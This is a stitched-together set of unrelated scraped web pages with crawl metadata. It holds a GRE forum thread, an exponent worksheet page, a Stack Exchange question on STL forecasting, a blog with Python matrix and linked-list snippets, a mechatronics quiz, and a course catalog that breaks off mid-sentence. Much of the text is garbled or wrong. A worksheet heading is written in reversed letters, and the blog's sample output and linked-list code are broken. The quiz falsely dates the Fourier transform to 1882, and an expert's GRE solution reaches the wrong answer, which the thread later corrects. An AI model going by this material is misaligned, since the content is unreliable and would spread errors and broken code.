20\n\nRe: x < y - 2 [#permalink]\n1\nKUDOS\nExpert's post\nCarcass wrote:\n$$x < y - 2$$\n\n Quantity A Quantity B The average (arithmetic mean) of x and y $$y-1$$\n\nA. Quantity A is greater.\nB. Quantity B is greater.\nC. The two quantities are equal\nD. The relationship cannot be determined from the information given.\n\n[Reveal] Spoiler: OA\nOA in 24h\n\nWe can solve this question using matching operations\n\nGiven:\nQuantity A: The average (arithmetic mean) of x and y\nQuantity B: y - 1\n\nApply definition of average to get:\nQuantity A: (x + y)/2\nQuantity B: y - 1\n\nMultiply both quantities by 2 to get:\nQuantity A: x + y\nQuantity B: 2y - 2\n\nSubtract y from both quantities to get:\nQuantity A: x\nQuantity B: y - 2\n\nSince it is GIVEN that x < y - 2, we can see that Quantity A is greater.\n\nRELATED VIDEO FROM OUR COURSE\n\n_________________\n\nBrent Hanneson – Creator of greenlighttestprep.com", null, "Manager", null, "Joined: 27 Sep 2017\nPosts: 112\nFollowers: 1\n\nKudos [?]: 30 , given: 4\n\nRe: x < y - 2 [#permalink]\nGreenlightTestPrep wrote:\nCarcass wrote:\n$$x < y - 2$$\n\n Quantity A Quantity B The average (arithmetic mean) of x and y $$y-1$$\n\nA. Quantity A is greater.\nB. Quantity B is greater.\nC. The two quantities are equal\nD. The relationship cannot be determined from the information given.\n\n[Reveal] Spoiler: OA\nOA in 24h\n\nWe can solve this question using matching operations\n\nGiven:\nQuantity A: The average (arithmetic mean) of x and y\nQuantity B: y - 1\n\nApply definition of average to get:\nQuantity A: (x + y)/2\nQuantity B: y - 1\n\nMultiply both quantities by 2 to get:\nQuantity A: x + y\nQuantity B: 2y - 2\n\nSubtract y from both quantities to get:\nQuantity A: x\nQuantity B: y - 2\n\nSince it is GIVEN that x < y - 2, we can see that Quantity A is greater.\n\nRELATED VIDEO FROM OUR COURSE\n\n\"Since it is GIVEN that x < y - 2, we can see that Quantity A is greater.\"\n\nYou are wrong: answer should be B\nGRE Instructor", null, "Joined: 10 Apr 2015\nPosts: 2175\nFollowers: 65\n\nKudos [?]: 1992 , given: 20\n\nRe: x < y - 2 [#permalink]\nExpert's post\nPeter wrote:\n\n\"Since it is GIVEN that x < y - 2, we can see that Quantity A is greater.\"\n\nYou are wrong: answer should be B\n\nGood catch!\n\nCheers,\nBrent\n_________________\n\nBrent Hanneson – Creator of greenlighttestprep.com", null, "", null, "Re: x < y - 2   [#permalink] 11 Dec 2017, 21:28\nDisplay posts from previous: Sort by\n\n# x < y - 2", null, "", null, "Question banks Downloads My Bookmarks Reviews Important topics", null, "", null, "Powered by phpBB © phpBB Group Kindly note that the GRE® test is a registered trademark of the Educational Testing Service®, and this site has neither been reviewed nor endorsed by ETS®." ]
[ null, "https://greprepclub.com/tests/resources/css/images/mobileMenu/greprepHeader.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/profile/close.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/search/close.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/new_topic.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/post_reply.png", null, "https://greprepclub.com/forum/images/ranks/rank_phpbb_7.gif", null, "https://greprepclub.com/forum/download/file.php", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/timer_play.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/timer_separator.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/timer_separator.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/timer_separator.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/left_kudos_icon.png", null, "https://greprepclub.com/forum/download/file.php", null, "https://i.imgur.com/Mw8wczq.jpg", null, "https://greprepclub.com/forum/images/ranks/rank_phpbb_3.gif", null, "https://greprepclub.com/forum/download/file.php", null, "https://i.imgur.com/Mw8wczq.jpg", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/posts_bot.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/new_topic.png", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/viewtopic/post_reply.png", null, "https://greprepclub.com/forum/cron.php", null, "https://greprepclub.com/forum/styles/gmatclub_light/theme/images/footer/copyright_small.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.72746134,"math_prob":0.91329324,"size":1345,"snap":"2019-26-2019-30","text_gpt3_token_len":376,"char_repetition_ratio":0.10589112,"word_repetition_ratio":0.017699115,"special_character_ratio":0.26914498,"punctuation_ratio":0.13409962,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97293794,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-22T16:22:34Z\",\"WARC-Record-ID\":\"<urn:uuid:8c52bf3b-cc20-40b1-8581-9e9daa41283a>\",\"Content-Length\":\"135122\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dd52a3ec-68b3-4417-9ffd-2e7836581610>\",\"WARC-Concurrent-To\":\"<urn:uuid:d1cd8e17-852f-428f-b9b2-8b8d8652e524>\",\"WARC-IP-Address\":\"198.11.238.98\",\"WARC-Target-URI\":\"https://greprepclub.com/forum/x-y-8260.html\",\"WARC-Payload-Digest\":\"sha1:522OZGWCSQHVWE45KA7SR7V63G7JO5EG\",\"WARC-Block-Digest\":\"sha1:FIRF7HEKHY7ZATK3DDDU7UXGMMFL6WDU\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195528141.87_warc_CC-MAIN-20190722154408-20190722180408-00127.warc.gz\"}"}
https://kidsworksheetfun.com/exponent-review-worksheet-answer-key/
[ "", null, "# Exponent Review Worksheet Answer Key\n\nExponent Review Worksheet Answer Key. This product contains guided notes with an answer key and a worksheet with answer key on basic exponent rules. Free worksheet with answer keys on exponents.\n\nA) 76 = 117 649 b) 38 = 6561 c) 53 = 125 d) 39 = 19 683. Write the following in the form of 5n : Anything to the zero power equals 1!\n\n### Math Worksheets Are Practical Tools That Can Show How Students Understand Key\n\nThis is a great addition to any test review activity, including glow days!includes questions on exponential notation, product of a power rule, quotient of a power rule, power to a power rule,. 27 problems are included with an answer key. If they answer the question correctly, they get to.\n\n### Free Trial Available At Kutasoftware.com\n\nThe basic exponent rules covered are multiplication of monomials, power to a power, division of monomials, the zero exponent rule, and negative exponents. Solve equations with variables in exponents; Minion exponent review search and shade teaching algebra math exponent laws review puzzle sheet by kathryn.\n\n### Worksheets Are Exponents Bundle 1, Exponent Rules Review Work, Loudoun County Public Schools Overview, Exponent Practice 1 Answer Key, Exponent Work With Answers, Exponent Rules Practice, Division Exponent And Answer Key Pdf, Central Bucks School District Home.\n\nAsk a question or answer a question. Write the following in the form of 5n : Exponent operations worksheet #1 author:\n\n### Solve Equations With Rational Exponents;\n\nWhen multiplying monomials that have the same base, add the exponents. A) 76 = 117 649 b) 38 = 6561 c) 53 = 125 d) 39 = 19 683. Worksheets worksheets exponents worksheet name answers evaluate to a.\n\n### Exponent Rules Review Worksheet Answer Key Gnitaulave Dna, Snoisserpxe Ciarbegla Cisab Otni Seulav Rebmun Elohw Nevig Gnitutitsbus, Elbairav Elgnis A Rof Snoitauqe Ciarbegla Gnivlos Dna Gnitirw Sedulcni Ti.stnenopxe Cisab Sedulcni Noitutitsbus.os Od Ot Detcurtsni Ton Er'yeht Ecnis Snoitarepo Fo Redro Tcerroc Eht Wollof Ton Lliw Stneduts Ynam.\n\n1) 54 5 2) 3 33 3) 22 23 4) 24 22 5) 3r3 2r 6) 7k2 4k3 7) 10 p4 6p 8) 3b 10 b3 9) 8m3. Two ways to print this free exponents educational worksheet: *click on open button to open and print to worksheet.", null, "Previous post Cute Printable Multiplication Table 1-12", null, "Next post Severe Weather Worksheets Pdf" ]
[ null, "https://kidsworksheetfun.com/wp-content/uploads/2022/07/final-review-pkg-2-page-1_1.jpg", null, "https://kidsworksheetfun.com/wp-content/uploads/2022/07/9c397f82dcfffbbcf165590d24dd3433-212x300.jpg", null, "https://kidsworksheetfun.com/wp-content/uploads/2022/07/0cc85bb45152bc8601cebbe098800947-255x300.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81389296,"math_prob":0.50257105,"size":3029,"snap":"2023-40-2023-50","text_gpt3_token_len":769,"char_repetition_ratio":0.13355371,"word_repetition_ratio":0.07936508,"special_character_ratio":0.23142952,"punctuation_ratio":0.10638298,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98864824,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,2,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-27T05:29:38Z\",\"WARC-Record-ID\":\"<urn:uuid:2b9144fd-8bee-48f8-b092-1a7257fa43c0>\",\"Content-Length\":\"127553\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d29e80ee-682c-41bd-95f9-399c92528532>\",\"WARC-Concurrent-To\":\"<urn:uuid:8da9d701-c154-4087-8530-5d53da1c1bfd>\",\"WARC-IP-Address\":\"172.67.190.136\",\"WARC-Target-URI\":\"https://kidsworksheetfun.com/exponent-review-worksheet-answer-key/\",\"WARC-Payload-Digest\":\"sha1:LS4QZ6LR7CIRLPGCM46U5MZHSQSEA3O4\",\"WARC-Block-Digest\":\"sha1:QKGDXY4XXHYYTRDJYAKLCJLY7EGCKIRN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510259.52_warc_CC-MAIN-20230927035329-20230927065329-00411.warc.gz\"}"}
https://stats.stackexchange.com/questions/140147/stl-random-walk-failing
[ "# STL + Random walk failing\n\nWe have four months of data (10 minute interval), this seems have nice pattern (at least for eye ball).\n\nWe are using STL to decompose the time series and apply \"random walk\" to project next month worth of data. Some how projected data is not following the input data pattern. Here is screenshot. The one marked with RED line is forecated output.\n\nWe couldn't figure out what behavior in input data might be causing this. Any help would be appreciated.", null, "It is interesting that R also generating similar chart:", null, "EDIT: I couldn't upload file, but here is link for data set.\n\nEDIT As everyone commented, it seems there is steep increase in trend at the end of time series. Here is trend chart (trend values extracted by STL):", null, "• The forecast for random walk is constant equal to the last observed value. Thus if you had just a random walk, the forecast would be a straight horizontal line. You have a seasonal component, too, and that seems to be forecast nicely (the pattern resembles the in-sample data). The problem seems to be that the forecast level is off. That could be either if the last observed value was an outlier which drove the random walk forecast off or because there is some programming mistake. Without more details it is hard to tell what is exactly the case. Mar 3, 2015 at 17:36\n• Thanks @RichardHardy \"constant equal to the last observed value\" (or) equal to last observed value of \"trend+reminder\" from STL? Could you please clarify this? AFAIK, STL breaks observed TS into season, trend and reminder.\n– kosa\nMar 3, 2015 at 17:54\n• You only mentioned seasonality and random walk, so I based my answer on that. What is random walk in your case? Is it \"remainder\" or \"remainder+trend\"? If \"remainder\" is random walk and there is \"trend\" extra to it, that could explain why the ultimate forecast seems to be slightly moving downward - that could be due to trend. So please give more details. Mar 3, 2015 at 18:00\n• Then your forecast should be a constant plus the seasonal component, as I noted above. There is nothing I could add to my first comment with regards to why the forecast fails. Mar 3, 2015 at 18:07\n• Where is the random walk? Random walk wanders all around your signal has compact bounds. Mar 3, 2015 at 20:46\n\nIn the future please provide a reproducible example. As others have pointed out, randomwalk forecast is nothing but the last value of the observed series.So if your deseasonalized data ends at say value 15, your forecast will be value 15 for level/trend. Then you would add seasonal component of had decomposed using STL.\n\nThe only way I can think of where you have such as dramatic shift in forecast is if you have a level shift at the end of the series which STL did not capture.\n\nFollowing is an illustration of my point. I used following code in R for STL and random walk forecast\n\nLets first consider STL decomposition.\n\nstl(AirPassengers,s.window=7)\n\n\nLast value of decompostion is as follows:\n\n seasonal trend remainder\nDec 1960 -51.52714133 495.9921 -12.46495550\n\n\nSo your forecast for trend in STL+random walk would be $trend + remainder$ = 495.9921 - 12.46495550 = 483.5271.\n\nSo your future forecast should have a trend value close to ~483. Lets check it:\n\nlibrary(\"forecast\")\nstl((stlf(AirPassengers,forecastfunction=rwf,h=36))$mean,s.window=7) See below for the first few values of the STL decomposed value of your forecast: Components seasonal trend remainder Jan 1961 -38.127116 483.5738 1.705303e-13 Feb 1961 -60.188237 483.5738 1.136868e-13 Mar 1961 -16.891877 483.5738 5.684342e-14 Apr 1961 -16.570300 483.5738 0.000000e+00 As we predicted, the random walk forecast trend is close to 483.", null, "• Thanks for your time and answer! I have added a link to data set. – kosa Mar 3, 2015 at 23:16 • As I experiment with this data set, I feel that \"trend/level\" is the culprit, but I couldn't really find out best solution to handle this (I am Ok to move out from STL + Random walk, if other solution answers this issue). – kosa Mar 3, 2015 at 23:18 • \"if you have a level shift at the end of the series\" it seems you are correct here, when I plot trend series extracted from STL, I see steep shift, updated question with screenshot. Does smoothing input series or something like that could help in this case? – kosa Mar 4, 2015 at 16:13 • No, you need to a dummy coding to control for steep shift. I'll try to post something if i find time today. Mar 4, 2015 at 16:36 • Add a dummy code (0 before level shift, 1 after level shift) variable in the xreg statement. You cannot do random walk any more, it has to be ARIMA. Mar 6, 2015 at 19:49 From the image it seems possible that the one large outlier in the middle may have disproportionately affected the estimate for the drift of the process (its \"long-run mean\"), and this is why the forecast has been shifted upwards. As an illustration, assume that the de-seasonalized data have an estimated long-run mean $$\\hat a=\\frac 1T\\sum_{t=1}^{T}x_i$$ Assume for simplicity that the last element of the sum is disproportionately large (as is the middle one in the image of the question). Decompose the long-run mean as $$\\hat a=\\frac 1T\\sum_{t=1}^{T-1}x_i + \\frac{x_T}{T}$$ Consider the relative magnitude of the last term $$\\frac {x_t/T}{\\frac 1T\\sum_{t=1}^{T-1}x_i} = \\frac {x_T}{\\sum_{t=1}^{T-1}x_i}$$ If this is \"large\", expect$\\hat a$to be visibly affected by this one observation. In turn$\\hat a\\$ will be used for prediction, shifting the long-term drift of the process.\n\nSo I would suggest to remove this on observation from your sample (or dump it artificially) to see what happens.\n\n• Thanks for your answer! I am working on dummy that large outlier. Will update soon.\n– kosa\nMar 3, 2015 at 18:41\n• I stubbed dummy value to ZERO for these outliers, still chart looks same. It seems \"trend\" factor from the STL decomposed causing this forecast to drift little bit. I am not sure why STL picking up upward trend in input series.\n– kosa\nMar 3, 2015 at 19:46" ]
[ null, "https://i.stack.imgur.com/YLnl7.png", null, "https://i.stack.imgur.com/KVCP5.png", null, "https://i.stack.imgur.com/5rmBW.png", null, "https://i.stack.imgur.com/S89ks.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9565046,"math_prob":0.82402146,"size":717,"snap":"2022-27-2022-33","text_gpt3_token_len":154,"char_repetition_ratio":0.09677419,"word_repetition_ratio":0.0,"special_character_ratio":0.21478382,"punctuation_ratio":0.10489511,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9793964,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T19:51:35Z\",\"WARC-Record-ID\":\"<urn:uuid:760350d3-788e-451d-bdba-398f392b7bb2>\",\"Content-Length\":\"250195\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:31622a95-db38-4cd6-a73a-ff8f47cf25f6>\",\"WARC-Concurrent-To\":\"<urn:uuid:65758de4-cee4-4ee0-ad63-71f8169fda60>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/140147/stl-random-walk-failing\",\"WARC-Payload-Digest\":\"sha1:RCVPFS674WJF4YJV5NEV5IQ3EZMSK6AG\",\"WARC-Block-Digest\":\"sha1:ETVNB46J4VAAYYFIXJFHXZLMLZXLJZII\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103877410.46_warc_CC-MAIN-20220630183616-20220630213616-00178.warc.gz\"}"}
https://www.elfsong.cn/category/uncategorized/
[ "We fall,\nWe break,\nWe fail,\n\nBut then,\n\nWe rise,\nWe heal,\nWe overcome.\n\nPrinting a pyramid matrix\n\nHow to print a pyramid matrix like that:\n\nn = 2\n[1, 1, 1]\n[1, 2, 1]\n[1, 1, 1]\n\nn = 3\n[1, 1, 1, 1]\n[1, 2, 2, 1]\n[1, 2, 2, 1]\n[1, 1, 1, 1]\n\nn = 4\n[1, 1, 1, 1, 1]\n[1, 2, 2, 2, 1]\n[1, 1, 3, 2, 1]\n[1, 2, 2, 2, 1]\n[1, 1, 1, 1, 1]\ndef func(N):\nN += 1\nmatrix = [[1 for _ in range(N)] for _ in range(N)]\ncnt = 0\n\nwhile cnt < N:\n# UP\nfor i in range(cnt, N - cnt - 1):\nmatrix[cnt][i] = cnt + 1\n\n# RIGHT\nfor i in range(cnt, N - cnt - 1):\nmatrix[i][N - cnt - 1] = cnt + 1\n\n# DOWN\nfor i in range(N - cnt - 1, cnt, -1):\nmatrix[N - cnt - 1][i] = cnt + 1\n\n# LEFT\nfor i in range(N - cnt, cnt, -1):\nmatrix[N - cnt - 1][cnt] = cnt + 1\n\ncnt += 1\n\nreturn matrix\n\nif __name__ == \"__main__\":\nmatrix = func(N=4)\n\nfor line in matrix:\nprint(line)\n\nReverse a singly linked list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL\nOutput: 5->4->3->2->1->NULL\n\nA linked list can be reversed either iteratively or recursively. Could you implement both?\n\nAs you can seen that recursion implementation is pretty easy to achieve, but iteratively achievement might not. Above are two implementations.\n\n# iteratively\nclass Solution(object):\n\"\"\"\n:rtype: ListNode\n\"\"\"\nreturn None\n\nwhile pionner.next:\npionner.next = pionner.next.next\n\n# recursively\n\nKeep going\n\nListen, smile, agree, and then do whatever the fuck you were gonna do anyway.\n\nCheers" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.7491377,"math_prob":0.99815834,"size":3374,"snap":"2019-43-2019-47","text_gpt3_token_len":2471,"char_repetition_ratio":0.10771513,"word_repetition_ratio":0.17391305,"special_character_ratio":0.26941317,"punctuation_ratio":0.18181819,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.97039425,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-18T06:55:27Z\",\"WARC-Record-ID\":\"<urn:uuid:16cd11e6-6815-488f-b513-dc61dc3f1388>\",\"Content-Length\":\"50498\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:83ecf2e4-3e9c-4d63-963f-19c73c56a66f>\",\"WARC-Concurrent-To\":\"<urn:uuid:5e718056-49e0-4665-a776-1d8c09859e02>\",\"WARC-IP-Address\":\"45.76.209.188\",\"WARC-Target-URI\":\"https://www.elfsong.cn/category/uncategorized/\",\"WARC-Payload-Digest\":\"sha1:NLZ6QRU3DXQEZVN6DIALTEJYMB2GS32Z\",\"WARC-Block-Digest\":\"sha1:5LAFRLG7RROF57M2LKN6BMETODG7RVBX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986677964.40_warc_CC-MAIN-20191018055014-20191018082514-00075.warc.gz\"}"}
https://www.sanfoundry.com/mechatronics-exam-questions-answers/
[ "# Mechatronics Questions and Answers – System Structure and Signal Flow in Pneumatic Systems\n\n«\n»\n\nThis set of Mechatronics Questions & Answers for Exams focuses on “System Structure and Signal Flow in Pneumatic Systems”.\n\n1. Which transform converts the function from time domain to “s” domain (complex frequency domain)?\na) Laplace Transform\nb) Fourier Transform\nc) Z Transform\nd) InverseLaplace Transform\n\nExplanation: Laplace transform converts the function from time domain to “s” domain (complex frequency domain). It is an integral that transforms the function from real time domain to a function of complex variable “s”.\n\n2. Who invented Laplace transform?\na) Pierre-Simon Laplace\nb) Pitas Laplace\nc) Charles young\nd) Charles Wheatstone\n\nExplanation: Pierre-Simon Laplace invented Laplace transform. It is an integral that transforms the function from real time domain to a function of complex variable “s”. The “s” represents a complex frequency domain.\n\n3. Which signal cannot be determined through mathematical equation?\na) Imaginary signal\nb) Non-Deterministic signal\nc) Aperiodic signal\nd) Power Signal\n\nExplanation: Non-Deterministic signal cannot be determined through mathematical equation. Its value at any point of time cannot be determined beforehand. Due to its random nature, it is also called as “Random Signal”.\nSanfoundry Certification Contest of the Month is Live. 100+ Subjects. Participate Now!\n\n4. What is the type of signal called, if it satisfies the equation x(t)=x(-t){where “t” represents time domain}?\na) Imaginary signal\nb) Non-Deterministic signal\nc) Odd Signal\nd) Even Signal\n\nExplanation: If a signal satisfies the equation x(t)=x(-t) {where “t” represents time domain}, then the signal is called as even signal. A signal is said to be odd signal if it satisfies the equation x(t)=-x(-t) {where “t” represents time domain}.\n\n5. Node and junction are same.\na) True\nb) False\n\nExplanation: Node and junction are not same. A node is a meeting point of two circuit elements, it does not matter if it’s active or passive element of the circuit. A junction is a point where least three circuit paths meet.\n\n6. Fourier transform converts the function from time domain to frequency domain.\na) True\nb) False\n\nExplanation: Fourier transform converts the function from time domain to frequency domain. It decomposes a function of time to a function of frequency. This transform was proposed by Joseph Fourier in the year 1882.\n\n7. Which Integrated circuit/module can generate square, sine and triangular waveforms?\na) ICL8038\nb) LMK61A2-125M00SIAT\nc) SLB700A/06VA\nd) FN2060A-6-06\n\nExplanation: ICL8038can generate square, sine and triangular waveforms. LMK61A2-125M00SIAT is a crystal oscillator that can generate square signals. FN2060A-6-06 is an example of Power line filter. SLB700A/06VA is a force sensor.\n\n8. What is the type of signal called, if it satisfies the equation x(t)=x(t+T) {where “t” represents time domain and T represents fundamental time period}?\na) Imaginary signal\nb) Periodic signal\nc) Odd Signal\nd) Even Signal\n\nExplanation: If a signal satisfies the equation x(t)=x(t+T) {where “t” represents time domain and T represents fundamental time period}, then the signal is called as periodic signal. Periodic signals repeat itself after the fundamental time period.\n\n9. What is the type of signal called, if it satisfies the equation x(t)=-x(-t) {where “t” represents time domain}?\na) Imaginary signal\nb) Non-Deterministic signal\nc) Odd Signal\nd) Even Signal\n\nExplanation: If a signal satisfies the equation x(t)=-x(-t) {where “t” represents time domain}, then the signal is called as Odd signal. A signal is said to be even signal if it satisfies the equation x(t)=x(-t) {where “t” represents time domain}.\n\n10. Which is an example of Square wave generator?\na) ICL8038\nb) CMCP793V-500\nc) SLB700A/06VA\nd) FN2060A-6-06\n\nExplanation: ICL8038is an example of Square wave generator. It can generate square, sine and triangular waveforms. FN2060A-6-06 is an example of Power line filter. SLB700A/06VA is a force sensor. CMCP793V-500 is a velocity sensor.\n\n11. What is the signal called if its value is defined only at fixed instants of time?\na) Discrete signal\nb) Non-Deterministic signal\nc) Random Signal\nd) Deterministic signal\n\nExplanation: If the value of signal is defined only at fixed instants of time then it is called as “Discrete Signal”. When the value of signal is defined at every instants of time then it is called as “Continuous Signal”.\n\n12. A System is a specified process which produces signal.\na) True\nb) False\n\nExplanation: A System is not a specified process which produces signal. Any process that can produce an output based on the input provided can be termed as a “System”. In general, a process that produces output signal based upon input signal is termed as a system.\n\n13. Z transform cannot convert discrete frequency signal to complex time domain.\na) True\nb) False\n\nExplanation: Z transform cannot convert discrete frequency signal to complex time domain. It converts discrete time signal to complex frequency domain. The discrete time signal constitutes a sequence of real and complex numbers.\n\n14. How many minimum number of circuit path, meeting at a point make up a junction?\na) 1\nb) 2\nc) 3\nd) 4\n\nExplanation: At least 3 circuit paths meeting at a point make up a junction. It can be any point on the electric circuit connected through electrical conductors. It is a point of junction of two or more branches.\n\n15. Which type of signal is also referred as random signal?\na) Imaginary signal\nb) Non-Deterministic signal\nc) Deterministic signal\nd) Power Signal\n\nExplanation: Non-Deterministic signal is also referred as random signal. These signals cannot be expressed in the form of mathematical equation. The value at any value of time cannot be determined.\n\nSanfoundry Global Education & Learning Series – Mechatronics.\n\nTo practice all exam questions on Mechatronics, here is complete set of 1000+ Multiple Choice Questions and Answers", null, "" ]
[ null, "data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20150%20150%22%3E%3C/svg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.798365,"math_prob":0.98610955,"size":6270,"snap":"2022-27-2022-33","text_gpt3_token_len":1561,"char_repetition_ratio":0.15528248,"word_repetition_ratio":0.33867735,"special_character_ratio":0.23429027,"punctuation_ratio":0.1058924,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9979295,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-12T05:47:01Z\",\"WARC-Record-ID\":\"<urn:uuid:abcfe675-1393-4d0f-ba4c-70fc707597ed>\",\"Content-Length\":\"153343\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:135175d3-cfda-490a-a45c-7cb85dd1eb0b>\",\"WARC-Concurrent-To\":\"<urn:uuid:d744f463-03a4-4229-bb91-ebffe011290f>\",\"WARC-IP-Address\":\"104.25.132.119\",\"WARC-Target-URI\":\"https://www.sanfoundry.com/mechatronics-exam-questions-answers/\",\"WARC-Payload-Digest\":\"sha1:QMYSAAR66NTITFVJI5FS32BG4K3CVRWW\",\"WARC-Block-Digest\":\"sha1:NN3JDJ7QWSXDQBOAFLVZAWCD3NE3RVBE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571584.72_warc_CC-MAIN-20220812045352-20220812075352-00767.warc.gz\"}"}
https://uca.edu/ubulletin/courses/math/
[ "", null, "Masks are required as the campus is at red status.\n\n# Mathematics (MATH)\n\n## Courses in Mathematics (MATH)\n\n1360 QUANTITATIVE LITERACY This course satisfies the general education aims of the university through the study of topics in contemporary mathematics. Upon completion of the course, students will be able to apply principles of mathematics to real-world situations, create mathematical and statistical models of the situations, and utilize the models to solve problems. Lecture/demonstration format. Prerequisite: Math ACT of 19 or higher (or equivalent SAT or Accuplacer score) or corequisite enrollment in UNIV 0360. [ACTS: MATH1113]\n\n1390 COLLEGE ALGEBRA This course satisfies the general education aims of the university by providing a solid foundation of algebraic concepts. The course includes the study of functions, relations, graphing, and problem solving, and provides a knowledge of how to apply these concepts to real problem situations. Lecture/demonstration format. Prerequisite: Math ACT of 19 or higher (or equivalent SAT or Accuplacer score) or corequisite enrollment in UNIV 0390. [ACTS: MATH1103]\n\n1392 PLANE TRIGONOMETRY Topics include angles and triangles and their measure, graphs and applications of trigonometric functions, and inverse trigonometric functions, vectors, polar coordinates, and complex numbers. This course can be coupled with College Algebra (MATH 1390) as an alternative prerequisite for Calculus I (MATH 1496). If one year has passed since successful completion of College Algebra, then Calculus Preparation (MATH 1486) is the preferred prerequisite for Calculus I (MATH 1496). Lecture/demonstration format. Prerequisite: MATH 1390 or equivalent. [ACTS: MATH1203]\n\n1395 APPLIED MATHEMATICS FOR BUSINESS As a component of the business foundation, this course is a requirement for all majors in the College of Business. The course builds on College Algebra by applying finite mathematics to business, finance, and economics. Topics include linear functions, systems of equations, matrices, optimization by means of linear programming, and finance. Problem solving and calculator technology will be emphasized. Prerequisite: MATH 1390 (C grade or higher) or equivalent.\n\n1486 CALCULUS PREPARATION A conceptual approach to the algebra and trigonometry essential for calculus. Designed for students who plan to study calculus, this course is the preferred prerequisite for Calculus I (MATH 1496) and satisfies the general education requirement in mathematics. Lecture and problem-solving activities. Prerequisite: Math ACT score of 21 or higher; or MATH 1390 with a grade of C or higher; or consent of instructor. [ACTS: MATH1305]\n\n1491 APPLIED CALCULUS FOR THE LIFE SCIENCES This course is a brief introduction to calculus and includes differentiation and integration of polynomial, exponential, trigonometric, and logarithmic functions, and applications in the life sciences. Lecture/demonstration format. Prerequisite: MATH 1390 or equivalent.\n\n1496 CALCULUS I As a prerequisite for nearly all upper-division mathematics, this course is a requirement for majors and minors in mathematics and other majors in the natural sciences and engineering. The content includes the study of limits, continuity, derivatives, integrals, and their applications. Lecture and problem solving activities. Prerequisites: MATH ACT of 27 or higher, or C or better in MATH 1486, or C or better in both MATH 1390 and MATH 1392, or equivalent . [ACTS: MATH2405]\n\n1497 CALCULUS II This course is required of all majors or minors in mathematics, chemistry, or physics. Topics include applications of the definite integral, techniques of integration, infinite series, conics, parametric equations, polar coordinates, vectors, and vector functions. This course is a prerequisite for Calculus III and most of the upper division mathematics courses. Lecture format. Prerequisite: C or better in MATH 1496. [ACTS: MATH2505]\n\n2V25 INDEPENDENT STUDY IN MATHEMATICS (Variable credit: 1-3 credit hours.) The student will independently study a mathematical topic with a faculty mentor. Course may be repeated. Prerequisites: MATH 1496 and consent of instructor.\n\n2311 ELEMENTARY STATISTICS The course introduces the basics of descriptive statistics, probability theory, and statistical inference. This course may be used to satisfy the statistics requirement in several degree programs. No credit can be awarded for more than one introductory statistics course from the following: GEOG 2330, MATH 